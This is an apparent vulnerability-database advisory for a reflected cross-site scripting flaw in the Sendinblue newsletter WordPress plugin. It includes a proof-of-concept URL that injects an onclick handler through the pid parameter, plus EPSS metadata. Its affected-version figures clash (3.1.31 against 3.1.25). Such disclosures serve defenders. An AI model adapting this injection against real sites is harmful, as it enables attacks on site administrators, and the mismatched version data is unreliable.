Lucene search

K
wpvulndbJrXnmWPVDB-ID:28D34CC1-2294-4409-A60F-C8C441EB3F2D
HistoryJan 12, 2022 - 12:00 a.m.

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting

2022-01-1200:00:00
JrXnm
wpscan.com
10

0.001 Low

EPSS

Percentile

40.2%

The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues

PoC

https://example.com/wp-admin/admin.php?sib_page_form&amp;action;=edit&amp;id;=1&amp;pid;=xxxxx"+accesskey%3DX+onclick%3Dalert(1)+test%3D"

CPENameOperatorVersion
mailinlt3.1.25

0.001 Low

EPSS

Percentile

40.2%

Related for WPVDB-ID:28D34CC1-2294-4409-A60F-C8C441EB3F2D